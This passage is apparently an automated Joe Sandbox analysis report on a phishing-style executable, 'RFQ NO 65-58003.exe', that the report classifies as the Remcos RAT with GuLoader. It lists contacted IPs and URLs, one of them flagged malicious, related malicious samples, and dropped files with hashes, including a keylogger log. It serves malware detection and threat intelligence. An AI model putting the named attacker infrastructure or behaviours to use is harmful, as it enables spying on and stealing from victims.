                              http://geoplugin.net/json.gphymsiexec.exe, 0000000E.00000002.3394879441.00000000056CD000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://www.imvu.commsiexec.exe, msiexec.exe, 00000014.00000002.2903934720.0000000000400000.00000040.80000000.00040000.00000000.sdmp, msiexec.exe, 00000014.00000003.2903653103.0000000002E9D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000014.00000003.2903681348.0000000002E9D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 0000000D.00000003.2526974098.000002B99ED30000.00000004.00000800.00020000.00000000.sdmp, edb.log.13.drfalse
                                    		high
                                    http://crl.ver)svchost.exe, 0000000D.00000002.3394216616.000002B99EE0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.google.com/accounts/serviceloginmsiexec.exefalse
                                        		high
                                        https://login.yahoo.com/config/loginmsiexec.exefalse
                                          		high
                                          http://www.nirsoft.netmsiexec.exe, 00000011.00000002.2923342242.0000000002C74000.00000004.00000010.00020000.00000000.sdmpfalse
                                            		high
                                            http://nsis.sf.net/NSIS_ErrorErrorRFQ NO 65-58003.exefalse
                                              		high
                                              http://www.nirsoft.net/msiexec.exe, 00000014.00000002.2903934720.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                		high
                                                http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.commsiexec.exe, 0000000E.00000002.3407723975.00000000211D0000.00000040.10000000.00040000.00000000.sdmp, msiexec.exe, 00000014.00000002.2903934720.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                  		high
                                                  http://geoplugin.net/json.gp_msiexec.exe, 0000000E.00000002.3394879441.00000000056E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://login.livemsiexec.exe, 00000011.00000002.2923434065.0000000002CBA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.ebuddy.commsiexec.exe, msiexec.exe, 00000014.00000002.2903934720.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                        		high

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        212.162.149.91
                                                        		unknownNetherlands
                                                        		64236UNREAL-SERVERSUStrue
                                                        212.162.149.92
                                                        		unknownNetherlands
                                                        		64236UNREAL-SERVERSUSfalse
                                                        178.237.33.50
                                                        		geoplugin.netNetherlands
                                                        		8455ATOM86-ASATOM86NLfalse

                                                        Private

                                                        IP
                                                        127.0.0.1

                                                        General Information

                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1577287
                                                        Start date and time:2024-12-18 11:03:11 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 6m 50s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:22
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:RFQ NO 65-58003.exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@28/20@1/4
                                                        EGA Information:
                                                        • Successful, ratio: 100%
                                                        HCA Information:
                                                        • Successful, ratio: 99%
                                                        • Number of executed functions: 151
                                                        • Number of non-executed functions: 348
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe

                                                        Warnings

                                                        • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                                                        • Excluded IPs from analysis (whitelisted): 92.122.16.236, 20.231.128.67, 20.199.58.43, 13.107.246.63, 2.16.158.27, 172.202.163.200, 20.223.36.55, 150.171.27.10, 2.16.158.74, 20.223.35.26
                                                        • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, tse1.mm.bing.net, g.bing.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, prod.fs.microsoft.com.akadns.net
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        05:04:07API Interceptor35x Sleep call for process: powershell.exe modified
                                                        05:04:41API Interceptor2x Sleep call for process: svchost.exe modified
                                                        05:05:46API Interceptor86x Sleep call for process: msiexec.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        212.162.149.91RFQ 008191.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                          order CF08093-24.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                            178.237.33.50SwiftCopy_PaymtRecpt121228.exeGet hashmaliciousRemcosBrowse
                                                            • geoplugin.net/json.gp
                                                            BBVA S.A..vbsGet hashmaliciousRemcosBrowse
                                                            • geoplugin.net/json.gp
                                                            Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                            • geoplugin.net/json.gp
                                                            Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                            • geoplugin.net/json.gp
                                                            Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                            • geoplugin.net/json.gp
                                                            givenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                            • geoplugin.net/json.gp
                                                            clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                            • geoplugin.net/json.gp
                                                            7Sbq4gMMlp.exeGet hashmaliciousRemcosBrowse
                                                            • geoplugin.net/json.gp
                                                            PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                            • geoplugin.net/json.gp
                                                            requests-pdf.exeGet hashmaliciousRemcosBrowse
                                                            • geoplugin.net/json.gp

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            fp2e7a.wpc.phicdn.netJnEZtj3vtN.exeGet hashmaliciousPureCrypterBrowse
                                                            • 192.229.221.95
                                                            YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                            • 192.229.221.95
                                                            billi_e58d74e455634dc695ed8a7b8b320325.exe.dom_1.exeGet hashmaliciousMetasploitBrowse
                                                            • 192.229.221.95
                                                            credit.jsGet hashmaliciousPureLog Stealer, RHADAMANTHYSBrowse
                                                            • 192.229.221.95
                                                            support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                            • 192.229.221.95
                                                            file.exeGet hashmaliciousRemcosBrowse
                                                            • 192.229.221.95
                                                            66DJ2wErLz.exeGet hashmaliciousLummaCBrowse
                                                            • 192.229.221.95
                                                            https://flusoprano.com/f/4/0/f24b0aaf975ee65a83aae9b19316ec90.jsGet hashmaliciousUnknownBrowse
                                                            • 192.229.221.95
                                                            nSs9QIsTua.jsGet hashmaliciousUnknownBrowse
                                                            • 192.229.221.95
                                                            http://uhsee.comGet hashmaliciousUnknownBrowse
                                                            • 192.229.221.95
                                                            geoplugin.netSwiftCopy_PaymtRecpt121228.exeGet hashmaliciousRemcosBrowse
                                                            • 178.237.33.50
                                                            BBVA S.A..vbsGet hashmaliciousRemcosBrowse
                                                            • 178.237.33.50
                                                            Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                            • 178.237.33.50
                                                            Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                            • 178.237.33.50
                                                            Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                            • 178.237.33.50
                                                            givenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                            • 178.237.33.50
                                                            clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                            • 178.237.33.50
                                                            7Sbq4gMMlp.exeGet hashmaliciousRemcosBrowse
                                                            • 178.237.33.50
                                                            PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                            • 178.237.33.50
                                                            requests-pdf.exeGet hashmaliciousRemcosBrowse
                                                            • 178.237.33.50

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            UNREAL-SERVERSUSSuzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                            • 162.251.122.87
                                                            Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                            • 162.251.122.87
                                                            Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                            • 162.251.122.87
                                                            WO-663071 Sabiya Power Station Project.vbsGet hashmaliciousRemcosBrowse
                                                            • 162.251.122.87
                                                            RFQ 008191.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                            • 212.162.149.89
                                                            purchase.order.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 212.162.149.66
                                                            Forhandlingsfriheden.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 212.162.149.66
                                                            order CF08093-24.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                            • 212.162.149.89
                                                            PO. A-72 9234567.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 212.162.149.89
                                                            la.bot.arm7.elfGet hashmaliciousMiraiBrowse
                                                            • 162.251.123.175
                                                            UNREAL-SERVERSUSSuzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                            • 162.251.122.87
                                                            Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                            • 162.251.122.87
                                                            Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                            • 162.251.122.87
                                                            WO-663071 Sabiya Power Station Project.vbsGet hashmaliciousRemcosBrowse
                                                            • 162.251.122.87
                                                            RFQ 008191.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                            • 212.162.149.89
                                                            purchase.order.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 212.162.149.66
                                                            Forhandlingsfriheden.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 212.162.149.66
                                                            order CF08093-24.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                            • 212.162.149.89
                                                            PO. A-72 9234567.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 212.162.149.89
                                                            la.bot.arm7.elfGet hashmaliciousMiraiBrowse
                                                            • 162.251.123.175
                                                            ATOM86-ASATOM86NLSwiftCopy_PaymtRecpt121228.exeGet hashmaliciousRemcosBrowse
                                                            • 178.237.33.50
                                                            BBVA S.A..vbsGet hashmaliciousRemcosBrowse
                                                            • 178.237.33.50
                                                            Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                            • 178.237.33.50
                                                            Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                            • 178.237.33.50
                                                            Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                            • 178.237.33.50
                                                            givenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                            • 178.237.33.50
                                                            clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                            • 178.237.33.50
                                                            7Sbq4gMMlp.exeGet hashmaliciousRemcosBrowse
                                                            • 178.237.33.50
                                                            PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                            • 178.237.33.50
                                                            requests-pdf.exeGet hashmaliciousRemcosBrowse
                                                            • 178.237.33.50

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                            Download File
                                                            Process:C:\Windows\System32\svchost.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):1310720
                                                            Entropy (8bit):0.7263298297673424
                                                            Encrypted:false
                                                            SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH07:9JZj5MiKNnNhoxuu
                                                            MD5:830A323FC6351DD098B803B500DA0D87
                                                            SHA1:1F9F9ED30F8091126CE2D6B09C1030A10ED1023F
                                                            SHA-256:9E2DE49DEB927EB523EA866530586BD2E9E79F1CEF5F682053C2D9D0E3E287B5
                                                            SHA-512:F1ACFC8FD4FA77E767FBF0D6425E74EADBA193278FA4A2B6F30AC7A829DDCDDAC4E9A2B0E952A72BB97358653CCF56CE1E11CD69125958EEB064A991B86E83CF
                                                            Malicious:false
                                                            Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                            Download File
                                                            Process:C:\Windows\System32\svchost.exe
                                                            File Type:Extensible storage user DataBase, version 0x620, checksum 0x2dd120c3, page size 16384, DirtyShutdown, Windows version 10.0
                                                            Category:dropped
                                                            Size (bytes):1310720
                                                            Entropy (8bit):0.7556082225936612
                                                            Encrypted:false
                                                            SSDEEP:1536:FSB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:FazaSvGJzYj2UlmOlOL
                                                            MD5:4C204BD985913415D6B93201D29C5B10
                                                            SHA1:F8AC7EB7BDCF5FB7046B172C4944461ED3A047CB
                                                            SHA-256:8AF3E2EBFA73CAECF3F750E293CE0D67835916D9B4F8267F177E0B47D131B94D
                                                            SHA-512:974005D6A0CC2D6BBC6207D4E1F30AC2087EB59DC1AF7ED564577299C5BAFAD711DF3B2C8815834EA8DD157A2202861D1C80185A9AF23B0DFC1A814D565A9DED
                                                            Malicious:false
                                                            Preview:-. .... .......7.......X\...;...{......................0.e......!...{?.)....|E.h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{...................................X?.)....|E..................H?.)....|E..........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................

                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                            Download File
                                                            Process:C:\Windows\System32\svchost.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):16384
                                                            Entropy (8bit):0.07930059882242216
                                                            Encrypted:false
                                                            SSDEEP:3:cImXlKYe7pp03rfNaAPaU1lRM+lXalluxmO+l/SNxOf:4lKz7UDNDPaU7QgmOH
                                                            MD5:B8C05CEFC976339BC29632EC1010F210
                                                            SHA1:96718AA90F1EE1AAD4DA82F82F49E39AB9276FAB
                                                            SHA-256:DD682227924F2BE85770AA92B652E61BD35FC27B30C078CBAC5D65730FBA1E17
                                                            SHA-512:108B50D9AE7F93823E8F1FB4AC2770A990408E53729C787C576999C44D8B3F0818E8366CD82550F0B6AB3A08CB2C1E36E76CEE847505ED6D874CCE89E1F69550
                                                            Malicious:false
                                                            Preview:w.@......................................;...{..)....|E..!...{?..........!...{?..!...{?..g...!...{?..................H?.)....|E.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\ProgramData\remcos\logs.dat

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):144
                                                            Entropy (8bit):3.3829237234308707
                                                            Encrypted:false
                                                            SSDEEP:3:rhlKlyKGlFSfVlwNUlWNqlDl5JWRal2Jl+7R0DAlBG45klovDl6v:6lZTfPwNUM4b5YcIeeDAlOWAv
                                                            MD5:85092DA2BA1F75488919E4EBC0759066
                                                            SHA1:9D397DD8771FE9C713C4F7DCAA8C798B1301785F
                                                            SHA-256:F15D3C13533417761C1FB6288CC4A22CC012D3091841E9093D7154EDFB4A4447
                                                            SHA-512:EBD8E8FFE5B08839BC2CEE1AC7AC5AA13A05973A0968FCF6FAD251F9886AA3E08F66B31C68DDD8D27202C509D9F499E4F69F12ECD9F9A36631ECCB7E1A98DF58
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                            Preview:....[.2.0.2.4./.1.2./.1.8. .0.5.:.0.5.:.1.3. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\json[1].json

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                            File Type:JSON data
                                                            Category:dropped
                                                            Size (bytes):963
                                                            Entropy (8bit):5.018384957371898
                                                            Encrypted:false
                                                            SSDEEP:12:tkluWJmnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zz2:qlupdRNuKyGX85jvXhNlT3/7CcVKWro
                                                            MD5:C9BB4D5FD5C8A01D20EBF8334B62AE54
                                                            SHA1:D38895F4CBB44CB10B6512A19034F14A2FC40359
                                                            SHA-256:767218EC255B7E851971A77B773C0ECC59DC0B179ECA46ABCC29047EEE6216AA
                                                            SHA-512:2D412433053610C0229FB3B73A26C8FB684F0A4AB03A53D0533FDC52D4E9882C25037015ACE7D4A411214AA9FAA780A8D950A83B57B200A877E26D7890977157
                                                            Malicious:false
                                                            Preview:{. "geoplugin_request":"8.46.123.189",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7503",. "geoplugin_longitude":"-74.0014",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:modified
                                                            Size (bytes):53158
                                                            Entropy (8bit):5.062687652912555
                                                            Encrypted:false
                                                            SSDEEP:1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
                                                            MD5:5D430F1344CE89737902AEC47C61C930
                                                            SHA1:0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
                                                            SHA-256:395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
                                                            SHA-512:DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
                                                            Malicious:false
                                                            Preview:PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kbfqudfq.nb5.psm1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pnfquu4q.kqa.ps1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rwzvunxc.rnf.ps1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_somkc24j.hfd.psm1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\bhv2FCF.tmp

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                            File Type:Extensible storage user DataBase, version 0x620, checksum 0x48a80eb4, page size 32768, DirtyShutdown, Windows version 10.0
                                                            Category:dropped
                                                            Size (bytes):15728640
                                                            Entropy (8bit):0.10104014649099108
                                                            Encrypted:false
                                                            SSDEEP:1536:2SB2jpSB2jFSjlK/sw/ZweshzbOlqVqNes3zbtzbheszO/ZklMes1:2a6aCUueqUW9A6d
                                                            MD5:E796721168B5A15288B11EA0CF3FEAD1
                                                            SHA1:370A6B25D747D53E95DC4E42C0CE76E8F9C85748
                                                            SHA-256:6D7692842AC335C0F73B9FB100338D6895F6160197337695DC188F1D616E7461
                                                            SHA-512:0740529F4959CD2C9354B304C75EF4C8EDBF70F0C8D48076EBA95A7FFF171D07ECF67ABFEBFF48C28CCD17949D3F26CC381B60179B567B864360C2D09D2A6F46
                                                            Malicious:false
                                                            Preview:H...... ...................':...{........................T.....8+...{...,...{G.h.V.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{.......................................,...{G......................,...{G..........................#......h.V.....................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\nsx55A.tmp

                                                            Download File
                                                            Process:C:\Users\user\Desktop\RFQ NO 65-58003.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):13648769
                                                            Entropy (8bit):0.517599773961608
                                                            Encrypted:false
                                                            SSDEEP:6144:LzmTsySRVs5zFkrZnR460uPbZndDVeCH0hHjKbF6ovOWY15VeTNMuDYbfHkV2Fq3:f1AfkdnGl8bbHg+52LLV+MxzkV2
                                                            MD5:BBB44ACA44C77848759AE4FBEC7B4486
                                                            SHA1:7F1B1AB6523A582229AC322492558E3AF5B3D342
                                                            SHA-256:F1A4722EFC192D070AE79F67C25E4FC44D2D48CCD73464C632B5B6A8DCA6CF52
                                                            SHA-512:A58F33235847769E251E8771C4CACA4CA4C4F2FD5D304AD586A23FC0436AC4588FA8C40823623D449CD6A93D6E357BE1BADEA751C7BE7A8AC5590B446F71E6B5
                                                            Malicious:false
                                                            Preview:4'......,...................t...t.......V&.......'..........................Y...y...........................................................................................................................................................................................................G...J...............j...............................................................................................................................................3....4..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Temp\vucumrgsvevkhhxckfc

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\msiexec.exe
                                                            File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):2
                                                            Entropy (8bit):1.0
                                                            Encrypted:false
                                                            SSDEEP:3:Qn:Qn
                                                            MD5:F3B25701FE362EC84616A93A45CE9998
                                                            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
